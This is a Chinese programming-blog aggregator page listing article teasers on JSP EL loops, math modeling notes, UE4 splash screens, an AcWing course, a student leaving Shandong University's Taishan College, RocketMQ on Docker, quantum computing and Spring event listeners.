文章浏览阅读4.4k次,点赞2次,收藏7次。一、jsp代码<%@ page language="java" import="java.util.*" pageEncoding="UTF-8"%><%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c"%><% List list = new ArrayList(); for (int i = 0; i <= 9; i++) { list.add(._el表达式 循环
《数学模型(第五版)》学习笔记(2)第3章 简单的优化模型 第4章 数学规划模型_数学模型第五版章节综述-程序员宅基地
文章浏览阅读875次,点赞18次,收藏16次。《数学模型(第五版)》学习笔记(2)第3章 简单的优化模型 第4章 数学规划模型_数学模型第五版章节综述
随便推点
【UE4】制作加载图片Splash_ue4 splash image-程序员宅基地
文章浏览阅读5.2k次,点赞7次,收藏18次。很多小伙伴都会有疑惑,有的大神可以有自己独特的加载界面,其实这个编辑过程很简单,今天带大家来一起Try一Try! 长话短说,如果我们不做改变,每一个编辑器加载时的界面都是一样的,那我们怎么样去根据自己的喜好来改变这个logo呢?1.打开虚幻编辑器,项目设置2.项目设置中找到这个更改界面,然后把鼠标放在logo上,我们可以看到这个图片是虚幻自带的文件中原本就默认存在的,那我们就..._ue4 splash image
Acwing算法提高课_acwing提高课-程序员宅基地
文章浏览阅读154次。90%的dp问题都能转化为最短路问题,拓扑图可以转化为dp问题。记住模型,到相似题目就会有更清晰的思路,不会到无从下手。_acwing提高课
报泰山学堂计算机条件,山东大学泰山学堂遭质疑 课程不合理致学生退学?-程序员宅基地
文章浏览阅读1.6k次。品牌观察网讯:1.88米的个头,普通话里有明显的山西口音,这个19岁的小伙子就是最近主动退出山东大学“泰山学堂”的马振军同学。别的同学想上“泰山学堂”都考不上,经过层层选拔好不容易考上的他却退出了。他为什么退出?11月9日下午,记者来到位于高新区的山东大学软件园校区,对他进行了专门采访。谈原因退出是因为不适应上两年基础课,时间太长记者:得知被“泰山学堂”录取是啥感觉?马振军:感觉挺兴奋的、也挺幸运..._山东大学软件学院能考泰山学堂数学学堂吗
docker部署rocketmq,本地应用访问不到broker解决办法_rocketmq控制面板没有broker-程序员宅基地
文章浏览阅读2.4k次。docker部署rocketmq,本地应用访问不到broker解决办法参考博客:Docker部署RocketMQ.最近按照这个博客在docker上部署了rocketmq,docker运行在虚拟机上,在windows上跑的测试程序连接上了nameserver但连接不上broker。本地代码如下:public class RocketMQSendMessage { //发送消息 public static void main(String[] args) throws Exception _rocketmq控制面板没有broker
梦想还是梦魇,告诉你一个真实的量子计算世界-程序员宅基地
文章浏览阅读82次。智造观点在很多人看来,量子计算机有一种“神奇的力量”,几乎可以完成传统计算机不能完成的所有任务。然而,事实上,如果量子计算机缺乏足够数量的处理单元,即量子比特,以及足够的稳定性来做有用的工作,这些好处就只是“纸上谈兵”。但面对这一新兴领域的无限潜力,包括中国、美国与欧盟等在内的不少国家和地区都已经开始在量子计算的研究方面发力;与此同时,从国外的IBM、..._虽然将量子计算机与传统计算机进行对比很难,但简单来说,只有几百个量子位的量子计
spring容器启动,停止,关闭事件监听-ApplicationEvent-程序员宅基地
文章浏览阅读4.2k次。2019独角兽企业重金招聘Python工程师标准>>> ..._applicationevent 需要关闭吗